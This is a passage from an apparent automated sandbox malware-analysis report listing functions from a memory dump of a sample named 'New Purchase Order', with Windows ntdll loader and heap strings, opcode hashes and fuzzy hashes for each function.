                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0114327D
                          • HEAP: , xrefs: 01143264
                          • HEAP[%wZ]: , xrefs: 01143255
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                          • API String ID: 0-617086771
                          • Opcode ID: c5ca78bfcf7f7082c9404f7489e97fbe776a1164cf4291738b63d3aaa2ae9948
                          • Instruction ID: 18c19d5acc803f9bd5e65a974f4ce638e2e196800864de64d33f6cc615dce51e
                          • Opcode Fuzzy Hash: c5ca78bfcf7f7082c9404f7489e97fbe776a1164cf4291738b63d3aaa2ae9948
                          • Instruction Fuzzy Hash: A392CD70A042599FDB2DCF68D444BADBBF1FF48B04F188059E899AB391D734A981CF51
                          Function 01140770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          • Opcode ID: cb0d05a5b1eedbfbde4ed870f7cfabaed33a28f77c93aae21160f3fcca028f3a
                          • Instruction ID: e1a740591e73ea6273a4ff8f129bae5c496b7c540d0f7d618b13d118bd6ffddf
                          • Opcode Fuzzy Hash: cb0d05a5b1eedbfbde4ed870f7cfabaed33a28f77c93aae21160f3fcca028f3a
                          • Instruction Fuzzy Hash: 27F1C070B00606DFEB1ECF69C894BAAB7B2FF48704F1441A9E6169B341D734E981CB91
                          Function 01156962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: $@
                          • API String ID: 0-1077428164
                          • Opcode ID: 07cfe27cbe0368a49f8024b8ea95e9122c2ff8c782a53c35802433b8ba765ea2
                          • Instruction ID: 7fb1babd780d818f87d0ae4b3233214e04b36dab14b1123ae36ad6109150c742
                          • Opcode Fuzzy Hash: 07cfe27cbe0368a49f8024b8ea95e9122c2ff8c782a53c35802433b8ba765ea2
                          • Instruction Fuzzy Hash: E9C2A071608341DFEB6DCF28C841BABBBE5AF88754F45892DE9E987241D734D804CB92
                          Function 0112A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: FilterFullPath$UseFilter$\??\
                          • API String ID: 0-2779062949
                          • Opcode ID: 3987ab807ba24ae5dd911981741fd4acf89c9fcf0a8701beedcddc6c88fe895e
                          • Instruction ID: 6482c5264e50cfc23c41d91afa6d88ee5a9666f492437365f6c058507d464bbb
                          • Opcode Fuzzy Hash: 3987ab807ba24ae5dd911981741fd4acf89c9fcf0a8701beedcddc6c88fe895e
                          • Instruction Fuzzy Hash: 44A17E719112299BDB35EF68CC88BEAB7B8EF44704F1041E9E909A7250D7359EC5CFA0
                          Function 01150BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                          Download Yara Rule
                          Strings
                          • LdrpCheckModule, xrefs: 0119A117
                          • Failed to allocated memory for shimmed module list, xrefs: 0119A10F
                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A121
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-161242083
                          • Opcode ID: 7660cc5259c514d223e67c8d12208a8416ddca9414025c2b22f54244f55f154b
                          • Instruction ID: 18b8a2cc08fffbdd592b665a70efc1554528dbb149584f5367ae3eb79cef4fa4
                          • Opcode Fuzzy Hash: 7660cc5259c514d223e67c8d12208a8416ddca9414025c2b22f54244f55f154b
                          • Instruction Fuzzy Hash: 9A71DD71A00205EFDF2DDFA8D884AAEB7F4FF88708F15406DE822A7251E734A945CB51
                          Function 01140A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-1334570610
                          • Opcode ID: 2dbf004c382abf23e7b25e688c491749157eab84bf73ed7196136721f165dc5f
                          • Instruction ID: bc16d43881af6e79bdcd42c2cadb94b4ce5d35d757d199b383429802620025dc
                          • Opcode Fuzzy Hash: 2dbf004c382abf23e7b25e688c491749157eab84bf73ed7196136721f165dc5f
                          • Instruction Fuzzy Hash: F161CF74604301DFDB2DCF29C440BAABBE2FF49B08F14855EE5598B292D770E981CB95
                          Function 0116C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                          Download Yara Rule
                          Strings
                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011A82DE
                          • minkernel\ntdll\ldrinit.c, xrefs: 011A82E8
                          • Failed to reallocate the system dirs string !, xrefs: 011A82D7
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1783798831
                          • Opcode ID: 928da4b594975b2e9abe3fbe2e56110e35217c828d48218496e510d3e784b1f2
                          • Instruction ID: 8eb6ac9697ef322b57728f0500c8544e8a19dd0e5872fdd9aba92d95cde6151e
                          • Opcode Fuzzy Hash: 928da4b594975b2e9abe3fbe2e56110e35217c828d48218496e510d3e784b1f2
                          • Instruction Fuzzy Hash: 7A41C176504311BBDB39EF68E844B6B7BE8BF48654F00492AF98897250E779D810CB92
                          Function 011EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                          Download Yara Rule
                          Strings
                          • @, xrefs: 011EC1F1
                          • PreferredUILanguages, xrefs: 011EC212
                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011EC1C5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                          • API String ID: 0-2968386058
                          • Opcode ID: 20a180a911e10a0ce0351c9f76e9df4ccf484b46df030c6c7f325a94be43a086
                          • Instruction ID: 59a4a501bea4abd353e531127c8acfcddda95b785e7cc21cae37ed05fbb315aa
                          • Opcode Fuzzy Hash: 20a180a911e10a0ce0351c9f76e9df4ccf484b46df030c6c7f325a94be43a086
                          • Instruction Fuzzy Hash: 94417372E0061AEBDF19DBD8CC85FEEBBF9AB14704F14406AE609B7240D7749A45CB90
                          Function 011C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                          • API String ID: 0-1373925480
                          • Opcode ID: b2476a7e47bf448de25a3996c4b7ce42d85fa37090921b3f939f01c85c812c69
                          • Instruction ID: 8ba23da8d140bb1912d2007ac56f8adc0c1bba0a3340957424859368e1b85c69
                          • Opcode Fuzzy Hash: b2476a7e47bf448de25a3996c4b7ce42d85fa37090921b3f939f01c85c812c69
                          • Instruction Fuzzy Hash: 8E412432A08299CBEB2EDBD8D850BACBBB5FFA5B44F14045DD941EBB81D7349901CB11
                          Function 011B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          Strings
                          • LdrpCheckRedirection, xrefs: 011B488F
                          • minkernel\ntdll\ldrredirect.c, xrefs: 011B4899
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011B4888
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-3154609507
                          • Opcode ID: f1f46893c28ed854b071460f2b5496daf9840f8ad9c5c3d66b5241d1b70d033c
                          • Instruction ID: 44f3cf6cbb36727a3c89812f590e470212df1f73623831d598f817ed544a0c4c
                          • Opcode Fuzzy Hash: f1f46893c28ed854b071460f2b5496daf9840f8ad9c5c3d66b5241d1b70d033c
                          • Instruction Fuzzy Hash: 2241D632A046519FCB29CE9CD8C0AA67BE4EF49650F06855DED8AD7B53D730D800CB91
                          Function 01140BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-2558761708
                          • Opcode ID: 35f2cb6913c9fd10a648169878a1c7aac8effc39f72f8c46aff3a1c8d484b540
                          • Instruction ID: 1508cfac3d174e69c3b638dc5496db7bdefc3a7569368241afeac7578e5c969d
                          • Opcode Fuzzy Hash: 35f2cb6913c9fd10a648169878a1c7aac8effc39f72f8c46aff3a1c8d484b540
                          • Instruction Fuzzy Hash: 43112131319102DFDFAECA19C450BBAB3A6EF44A19F19802EF616DB251EB30D841C75A
                          Function 011B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                          Download Yara Rule
                          Strings
                          • Process initialization failed with status 0x%08lx, xrefs: 011B20F3
                          • minkernel\ntdll\ldrinit.c, xrefs: 011B2104
                          • LdrpInitializationFailure, xrefs: 011B20FA
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2986994758
                          • Opcode ID: f044a09a338d5be3602eca75db62661e8152720003bf77e8ce63c9c49ac778d1
                          • Instruction ID: d3e2a771137be1ad710b7617a7045ac7bebf163a3f363cc74ccbe24d4c3585a2
                          • Opcode Fuzzy Hash: f044a09a338d5be3602eca75db62661e8152720003bf77e8ce63c9c49ac778d1
                          • Instruction Fuzzy Hash: 4BF0C835640308BBE73CEA4DEC46FD97768EB44B54F600069FA0077685D3F0A504C651
                          Function 011403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: #%u
                          • API String ID: 48624451-232158463
                          • Opcode ID: 4fd75d518ee3d19eb909942756ecdf87261dda28f522ff55c78079d724a3260e
                          • Instruction ID: 934238d591757b9c18b0b460981ed7c274fcd603904170a648cf01f6bcdb8a83
                          • Opcode Fuzzy Hash: 4fd75d518ee3d19eb909942756ecdf87261dda28f522ff55c78079d724a3260e
                          • Instruction Fuzzy Hash: DC714771A0014A9FDB09DFA9C990BAEBBF8BF18744F154065E905A7251EB34EE01CBA1
                          Function 0113A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                          Download Yara Rule
                          Strings
                          • LdrResSearchResource Enter, xrefs: 0113AA13
                          • LdrResSearchResource Exit, xrefs: 0113AA25
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                          • API String ID: 0-4066393604
                          • Opcode ID: 23b3dd918a9e36ace10c1bea4365fa7c3247716931907c711a60993fa18ca6ca
                          • Instruction ID: 3fa9f962db41abfe42f009d1ef0a030d42478033524a99dad851ff8df5925716
                          • Opcode Fuzzy Hash: 23b3dd918a9e36ace10c1bea4365fa7c3247716931907c711a60993fa18ca6ca
                          • Instruction Fuzzy Hash: 49E1C271E00219AFEF2ECFA8D980BAEBBB9FF84314F050425E961E7259D7349941CB11
                          Function 011FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                          • Instruction ID: ce387a762f9360c2e914742acc6c800cfc77f787f6532655e548573ca262cab7
                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                          • Instruction Fuzzy Hash: 08C1B1312043469BE729CF28D845B6BBBE5AFC4318F084A2DF79ACB290D779D505CB52
                          Function 011AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          • Opcode ID: d1c950874b454951e6ec6bb8fe9c724693e390521f54fddc8cae05e1ec576d3f
                          • Instruction ID: 8d3e24ba09e73e6af92b4db40526a2a91f55d1d1910439830db85e453d086be6
                          • Opcode Fuzzy Hash: d1c950874b454951e6ec6bb8fe9c724693e390521f54fddc8cae05e1ec576d3f
                          • Instruction Fuzzy Hash: 02615B76E016199FDB29DFA8C880BAEBFB9FB44704F54402DE649EB291D731A900CB50
                          Function 011D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$MUI
                          • API String ID: 0-17815947
                          • Opcode ID: 12e63691bf1fe698d201c7e4d79d08ea8453e51f2d58e6b44686c05166b006d1
                          • Instruction ID: d54d0ba3163e14d8b0a358c60edcc053606dd38cac56c96d68b275f9ca981efc
                          • Opcode Fuzzy Hash: 12e63691bf1fe698d201c7e4d79d08ea8453e51f2d58e6b44686c05166b006d1
                          • Instruction Fuzzy Hash: 89510971E0021DAFDF15DFA9CC90AEEBBB9EB44758F10052AE611B7690D7309E45CB60
                          Function 011304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0113063D
                          • kLsE, xrefs: 01130540
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                          • API String ID: 0-2547482624
                          • Opcode ID: 96848103577d993661ce756101a4d1b879eeab83b68fb83c0878a07838a06edb
                          • Instruction ID: 1a17f2f730ec865e8d087a5edb14892ced374dcf523ba635eafdc652f67cef20
                          • Opcode Fuzzy Hash: 96848103577d993661ce756101a4d1b879eeab83b68fb83c0878a07838a06edb
                          • Instruction Fuzzy Hash: 8F51BEB15047429FD729EF28C4446A7BBE4AFC8304F10483EFAEA87289E774D545CB92
                          Function 0113A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                          Download Yara Rule
                          Strings
                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0113A2FB
                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0113A309
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                          • API String ID: 0-2876891731
                          • Opcode ID: af4f3d2e0bc2312a696a1b28b1526282dba5e2285fbe53d21c08b8832101f129
                          • Instruction ID: e15e1f47de19d0b2397e5ca22e48ca02ab85b805cb9429766cdf0176cfcc921a
                          • Opcode Fuzzy Hash: af4f3d2e0bc2312a696a1b28b1526282dba5e2285fbe53d21c08b8832101f129
                          • Instruction Fuzzy Hash: F6411F30A08255DBEB2DCF58D880BAE7BF4FF80704F1440A9E951DB2A5E3B4D900CB41
                          Function 0116A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Cleanup Group$Threadpool!
                          • API String ID: 2994545307-4008356553
                          • Opcode ID: bb64fbf15e0e9610e44bd51166ce73b7cf1ded06422e81f6c7281aa1755ca723
                          • Instruction ID: 16c7df5dc7838af063adc0746d3743e4e95e0bc9b85e58a4cf6ddc8c3cc51378
                          • Opcode Fuzzy Hash: bb64fbf15e0e9610e44bd51166ce73b7cf1ded06422e81f6c7281aa1755ca723
                          • Instruction Fuzzy Hash: 0A014FB2200700AFD326CF24ED09F2A77E8EB80B29F008839F608C7580E374E810CB46
                          Function 0113C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: MUI
                          • API String ID: 0-1339004836
                          • Opcode ID: 75b356abc7b4544a36d24fd610cc16b02e7a71d5b4f8980cb97c7b5133d631d3
                          • Instruction ID: e6635745057a7f283a7a08a6bda2804f7cf840aa19db8f0d037825d0fb480871
                          • Opcode Fuzzy Hash: 75b356abc7b4544a36d24fd610cc16b02e7a71d5b4f8980cb97c7b5133d631d3
                          • Instruction Fuzzy Hash: 21827C75E002188BEF2CCFA9C8807EDBBB5BF88750F14816AD919BB259D7309D45CB91
                          Function 011B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 12861bd4b4a4c0c8bbea07ff4e63dcfca1897a2a86ce3a447edba36708f24d97
                          • Instruction ID: bc1c6e0e24803123a68d8e19c52466e11f89bfd9de0f5b9173621ba9e0c13d58
                          • Opcode Fuzzy Hash: 12861bd4b4a4c0c8bbea07ff4e63dcfca1897a2a86ce3a447edba36708f24d97
                          • Instruction Fuzzy Hash: BF917372900619AFEB29DF95CC85FEEBBB8EF18B54F100065F610AB191D774AD00CBA0
                          Function 011DE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 2c6bcb04b8ffc995e575cf7d17c274af42be422b25db7b8a69be7fe7c541f966
                          • Instruction ID: a3eb0082cb41dcce5744860b3490c331f3d071850702ed4ec73e340667cc4efb
                          • Opcode Fuzzy Hash: 2c6bcb04b8ffc995e575cf7d17c274af42be422b25db7b8a69be7fe7c541f966
                          • Instruction Fuzzy Hash: 3B91AF31A02609BFDB2AAFA5DC84FEFBB79EF85744F100029F511AB250DB759901CB91
                          Function 0116A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: GlobalTags
                          • API String ID: 0-1106856819
                          • Opcode ID: 6a93e9bf31c30d2bcfc345a9c433d47060bc4cb384525ad87cfd0780cfe3e4bb
                          • Instruction ID: 70a7f55d65d2c546980273b4faaa56a6f32c0f287bfdf93340ec2164d0026e99
                          • Opcode Fuzzy Hash: 6a93e9bf31c30d2bcfc345a9c433d47060bc4cb384525ad87cfd0780cfe3e4bb
                          • Instruction Fuzzy Hash: 49717BB9E0031ADFDF2CCF98D590AADBFB2BF48704F58812AE905A7245E7318941CB50
                          Function 011D4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: .mui
                          • API String ID: 0-1199573805
                          • Opcode ID: e954275c007ecb6ac1907a8246be0133013562a0d914fe978948f18434ff77e2
                          • Instruction ID: d0792f9142425e427d2eef8d3d92495cf556900c579a034a45fed4aa71b745db
                          • Opcode Fuzzy Hash: e954275c007ecb6ac1907a8246be0133013562a0d914fe978948f18434ff77e2
                          • Instruction Fuzzy Hash: 1351C472D0022A9BDF1DDF99D840AAEBBB4BF14A44F054129E912BBA54D7349C01CFE5
                          Function 0114E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: EXT-
                          • API String ID: 0-1948896318
                          • Opcode ID: b4d7e4cc02a9700a6dffd5e1471167560a0d5f4f96eb2607c5ce498a6888d9bb
                          • Instruction ID: c0fd957dabdd7387d4366d0f02047f7e0b0978524c7653a8dee3e915b3d94851
                          • Opcode Fuzzy Hash: b4d7e4cc02a9700a6dffd5e1471167560a0d5f4f96eb2607c5ce498a6888d9bb
                          • Instruction Fuzzy Hash: 7341A1715097129BD719DB75C880B6BB7E8BF88B29F040D2DF684D7180E778D9048797
                          Function 011AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: BinaryHash
                          • API String ID: 0-2202222882
                          • Opcode ID: d0795d97f51807a6caa3f40f2d1094b0dfac2241e74ef530bb8aa3ff926c4620
                          • Instruction ID: b05321d4f73dd320ab02c79a0003eb805f8453b7b5e48fe732e28f5ee8c1c602
                          • Opcode Fuzzy Hash: d0795d97f51807a6caa3f40f2d1094b0dfac2241e74ef530bb8aa3ff926c4620
                          • Instruction Fuzzy Hash: F14144B5D0012DAADB25DA60CC84FDEBB7CAB54718F4045E5E608AB240DB709E498FD4
                          Function 011C6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          • Opcode ID: 27f5b7ede9471433f15cfd873cc02a39971a8eaf740866bdb73a76218311fddb
                          • Instruction ID: 22a7c60aecf059253cd82c1e9f68994f9969f2a2e9979da8e5cd0efbb335714b
                          • Opcode Fuzzy Hash: 27f5b7ede9471433f15cfd873cc02a39971a8eaf740866bdb73a76218311fddb
                          • Instruction Fuzzy Hash: B1313931A007199BEB3ADF69C850BEE7BB8DF25B04F14402CE951AB382C775D905CB54
                          Function 011ACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: BinaryName
                          • API String ID: 0-215506332
                          • Opcode ID: 38774543ec4a3b8bc01609cd90ea65fb3d60f21c22c48886b8786cde0bcb6520
                          • Instruction ID: 3611cdd8d8adc6ae1756e34b1b75b6ecf62195e3107c054690d69c74b1dd8bdd
                          • Opcode Fuzzy Hash: 38774543ec4a3b8bc01609cd90ea65fb3d60f21c22c48886b8786cde0bcb6520
                          • Instruction Fuzzy Hash: DD31037A900519AFEB1DDB58C851FBFFF74EB807A0F414129A911A7250D7319E00DBE0
                          Function 011B892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                          Download Yara Rule
                          Strings
                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011B895E
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                          • API String ID: 0-702105204
                          • Opcode ID: 8bd4a29cdedea4234fa111c5b066252fad5da756755b82d52e511b0e1d54d83c
